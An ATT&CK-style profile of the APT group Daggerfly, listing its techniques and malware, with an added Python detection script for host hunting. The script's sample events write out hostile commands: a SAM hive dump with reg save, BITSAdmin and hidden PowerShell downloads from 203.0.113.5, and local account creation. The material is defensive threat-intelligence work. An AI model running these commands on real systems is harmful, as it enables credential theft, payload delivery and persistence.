Daggerfly

Daggerfly is a People's Republic of China-linked advanced persistent threat (APT) group active since at least 2012. Daggerfly has targeted individuals, government and NGO entities, and telecommunication companies in Asia and Africa. Daggerfly is associated with exclusive use of the MgBot malware and with several suspected software supply chain infection campaigns.[1][2][3][4]

ID: G1034
Associated Groups: Evasive Panda, BRONZE HIGHLAND
Contributors: Furkan Celik, PURE7
Version: 1.0
Created: 25 July 2024
Last Modified: 31 October 2024

Associated Group Descriptions

Name Description
Evasive Panda [1][4]
BRONZE HIGHLAND [1][4]

Techniques Used

Domain ID Name Use
Enterprise T1071 .001 Application Layer Protocol: Web Protocols

Daggerfly uses HTTP for command and control communication.[4]

Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

Daggerfly used PowerShell to download and execute remote-hosted files on victim systems.[1]

Enterprise T1584 .004 Compromise Infrastructure: Server

Daggerfly compromised web servers that host software updates, as part of a supply chain intrusion.[4]

Enterprise T1136 .001 Create Account: Local Account

Daggerfly created a local account on victim machines to maintain access.[1]

Enterprise T1587 .002 Develop Capabilities: Code Signing Certificates

Daggerfly created code signing certificates to sign malicious macOS files.[4]

Enterprise T1189 Drive-by Compromise

Daggerfly has used strategic website compromise for initial access against victims.[4]

Enterprise T1574 .002 Hijack Execution Flow: DLL Side-Loading

Daggerfly has used legitimate software to side-load PlugX loaders onto victim systems.[1] Daggerfly is also linked to multiple other instances of side-loading for initial loading activity.[4]

Enterprise T1105 Ingress Tool Transfer

Daggerfly has used PowerShell and BITSAdmin to retrieve follow-on payloads from external locations for execution on victim machines.[1]

Enterprise T1036 .003 Masquerading: Rename System Utilities

Daggerfly used a renamed version of rundll32.exe, such as "dbengin.exe" located in the ProgramData\Microsoft\PlayReady directory, to proxy malicious DLL execution.[1]

Enterprise T1003 .002 OS Credential Dumping: Security Account Manager

Daggerfly used Reg to dump the Security Account Manager (SAM) hive from victim machines for follow-on credential extraction.[1]

Enterprise T1012 Query Registry

Daggerfly used Reg to dump the Security Account Manager (SAM), System, and Security Windows registry hives from victim machines.[1]

Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

Daggerfly has attempted to use scheduled tasks for persistence in victim environments.[4]

Enterprise T1553 .002 Subvert Trust Controls: Code Signing

Daggerfly has used signed, but not notarized, malicious files for execution in macOS environments.[4]

Enterprise T1195 .002 Supply Chain Compromise: Compromise Software Supply Chain

Daggerfly is associated with several software supply chain compromises in which malicious updates were delivered to victims.[2][4]

Enterprise T1218 .011 System Binary Proxy Execution: Rundll32

Daggerfly proxied execution of malicious DLLs through a renamed rundll32.exe binary.[1]

Enterprise T1082 System Information Discovery

Daggerfly uses operating system details collected from the victim machine to build custom User-Agent strings for subsequent command and control communication.[4]

Enterprise T1204 .001 User Execution: Malicious Link

Daggerfly has used strategic website compromise to deliver a malicious link requiring user interaction.[4]
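
As an added hunting example (not ATT&CK content and not any vendor's detection logic), the following Python runs a handful of rules for the Windows host techniques listed above (renamed rundll32.exe such as dbengin.exe in ProgramData\Microsoft\PlayReady, Reg saving the SAM, SYSTEM and SECURITY hives, BITSAdmin and PowerShell ingress tool transfer, and local account creation with net user /add) over constructed process-creation records. The Sysmon-style field names (Image, OriginalFileName, CommandLine), the sample command lines, the loader.dll and a.exe file names and the 203.0.113.5 address are assumptions made for illustration; only the PlayReady path and the dbengin.exe name come from the page.

```python
"""Host-hunting rules for the Daggerfly tradecraft in the technique table above.
Added example, not ATT&CK content or any vendor's detection logic. Runs over
constructed process-creation records using Sysmon Event ID 1 field names
(Image, OriginalFileName, CommandLine); events, file names and the
203.0.113.5 address are made up for illustration.
"""
import ntpath
import re

# Directory named on this page for the renamed rundll32.exe (dbengin.exe).
PLAYREADY_DIR = "\\programdata\\microsoft\\playready\\"
HIVE_RE = re.compile(r"\bhk(?:lm|ey_local_machine)\\(?:sam|system|security)\b", re.I)
PS_DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|downloaddata|invoke-webrequest|\biwr\b"
    r"|invoke-restmethod|\birm\b|start-bitstransfer", re.I)
URL_RE = re.compile(r"\b(?:https?|ftp)://", re.I)


def _image_name(ev):
    # ntpath handles Windows separators even when this runs on Linux/macOS.
    return ntpath.basename(ev.get("Image", "")).lower()


def renamed_rundll32(ev):
    """T1036.003 + T1218.011: PE version info says RUNDLL32.EXE but the on-disk
    name differs, or any executable runs from the PlayReady data directory."""
    name, orig = _image_name(ev), ev.get("OriginalFileName", "").lower()
    if orig == "rundll32.exe" and name != "rundll32.exe":
        return f"rundll32 renamed to {name}"
    if PLAYREADY_DIR in ev.get("Image", "").lower():
        return f"executable {name} launched from ProgramData\\Microsoft\\PlayReady"
    return None


def reg_hive_dump(ev):
    """T1003.002 + T1012: reg.exe saving or exporting SAM, SYSTEM or SECURITY."""
    cmd = ev.get("CommandLine", "")
    if _image_name(ev) == "reg.exe" and re.search(r"\b(save|export)\b", cmd, re.I):
        m = HIVE_RE.search(cmd)
        if m:
            return f"reg {m.group(0)} written to disk"
    return None


def ingress_tool_transfer(ev):
    """T1105: BITSAdmin /transfer or a PowerShell download cradle fetching a URL."""
    name, cmd = _image_name(ev), ev.get("CommandLine", "")
    if name == "bitsadmin.exe" and "/transfer" in cmd.lower() and URL_RE.search(cmd):
        return "bitsadmin /transfer from remote URL"
    if name in ("powershell.exe", "pwsh.exe") and PS_DOWNLOAD_RE.search(cmd) and URL_RE.search(cmd):
        return "PowerShell download cradle"
    return None


def local_account_created(ev):
    """T1136.001: net user <name> ... /add creating a local account."""
    cmd = ev.get("CommandLine", "")
    if _image_name(ev) in ("net.exe", "net1.exe") and re.search(r"\buser\b.*\s/add\b", cmd, re.I):
        return "local account added with net user"
    return None


RULES = [
    ("T1036.003/T1218.011", renamed_rundll32),
    ("T1003.002/T1012", reg_hive_dump),
    ("T1105", ingress_tool_transfer),
    ("T1136.001", local_account_created),
]


def hunt(events):
    """Return one (event index, technique, reason) tuple per rule hit."""
    findings = []
    for i, ev in enumerate(events):
        for technique, rule in RULES:
            reason = rule(ev)
            if reason:
                findings.append((i, technique, reason))
    return findings


# Constructed sample events: indices 0 and 3 are benign, the rest model the page.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"Image": r"C:\ProgramData\Microsoft\PlayReady\dbengin.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"dbengin.exe C:\ProgramData\Microsoft\PlayReady\loader.dll,Start"},
    {"Image": r"C:\Windows\System32\reg.exe", "OriginalFileName": "reg.exe",
     "CommandLine": r"reg save hklm\sam C:\Windows\Temp\sam.hiv"},
    {"Image": r"C:\Windows\System32\reg.exe", "OriginalFileName": "reg.exe",
     "CommandLine": r"reg export HKCU\Software\Classes C:\Temp\classes.reg"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job /download /priority high http://203.0.113.5/u.dat C:\Windows\Temp\u.dat"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell -nop -w hidden -c \"(New-Object Net.WebClient).DownloadFile('http://203.0.113.5/a.exe','C:\\Windows\\Temp\\a.exe')\""},
    {"Image": r"C:\Windows\System32\net.exe", "OriginalFileName": "net.exe",
     "CommandLine": "net user support1 P@ssw0rd! /add"},
]

if __name__ == "__main__":
    for index, technique, reason in hunt(SAMPLE_EVENTS):
        print(f"event {index}: {technique}: {reason}")
```

The OriginalFileName comparison is the durable check for the rundll32 case: a copied binary keeps its PE version resource, so renaming it to dbengin.exe does not change that field. The hive rule keys on the save/export verbs rather than on reg.exe alone, because reg query and reg add are routine on most hosts; an alert on every reg.exe launch would drown the real signal.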

Software

ID Name References Techniques
S0190 BITSAdmin Daggerfly has used BITSAdmin to retrieve files from remote locations to run on victim systems.[1] BITS Jobs, Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Ingress Tool Transfer, Lateral Tool Transfer
S1016 MacMa Daggerfly is linked to the use and potentially development of MacMa through overlapping command and control infrastructure and shared libraries with other unique tools.[3] Audio Capture, Command and Scripting Interpreter: Unix Shell, Create or Modify System Process: Launch Agent, Credentials from Password Stores: Keychain, Data from Local System, Data Staged: Local Data Staging, Deobfuscate/Decode Files or Information, Encrypted Channel, Exfiltration Over C2 Channel, File and Directory Discovery, Indicator Removal: Clear Linux or Mac System Logs, Indicator Removal: Timestomp, Indicator Removal: File Deletion, Ingress Tool Transfer, Input Capture: Keylogging, Native API, Non-Application Layer Protocol, Non-Standard Port, Process Discovery, Remote Services, Screen Capture, Subvert Trust Controls: Code Signing, Subvert Trust Controls: Gatekeeper Bypass, System Information Discovery, System Network Configuration Discovery, System Owner/User Discovery
S1146 MgBot Daggerfly is uniquely associated with the use of MgBot since at least 2012.[2] Account Discovery: Domain Account, Account Discovery: Local Account, Audio Capture, Clipboard Data, Credentials from Password Stores, Credentials from Password Stores: Credentials from Web Browsers, Data from Information Repositories, Data from Local System, Data from Removable Media, Domain Trust Discovery, Input Capture: Keylogging, Network Service Discovery, OS Credential Dumping, Process Discovery, Remote System Discovery, Steal Web Session Cookie, System Owner/User Discovery
S1147 Nightdoor Daggerfly uses Nightdoor as a backdoor mechanism for Windows hosts.[4][3] Application Layer Protocol, Command and Scripting Interpreter: Windows Command Shell, Deobfuscate/Decode Files or Information, Hijack Execution Flow, Indicator Removal: File Deletion, Process Discovery, Scheduled Task/Job: Scheduled Task, System Information Discovery, System Network Configuration Discovery, System Owner/User Discovery, System Time Discovery, Virtualization/Sandbox Evasion: System Checks, Web Service
S0013 PlugX Daggerfly has used PlugX loaders as part of intrusions.[1] Application Layer Protocol: Web Protocols, Application Layer Protocol: DNS, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Create or Modify System Process: Windows Service, Deobfuscate/Decode Files or Information, Encrypted Channel: Symmetric Cryptography, File and Directory Discovery, Hide Artifacts: Hidden Files and Directories, Hijack Execution Flow: DLL Side-Loading, Hijack Execution Flow: DLL Search Order Hijacking, Ingress Tool Transfer, Input Capture: Keylogging, Masquerading: Masquerade Task or Service, Masquerading: Match Legitimate Name or Location, Modify Registry, Native API, Network Share Discovery, Non-Application Layer Protocol, Obfuscated Files or Information, Process Discovery, Query Registry, Screen Capture, System Network Connections Discovery, Trusted Developer Utilities Proxy Execution: MSBuild, Virtualization/Sandbox Evasion: System Checks, Web Service: Dead Drop Resolver
S0075 Reg Daggerfly has used Reg to dump various Windows registry hives from victim machines.[1] Modify Registry, Query Registry, Unsecured Credentials: Credentials in Registry

References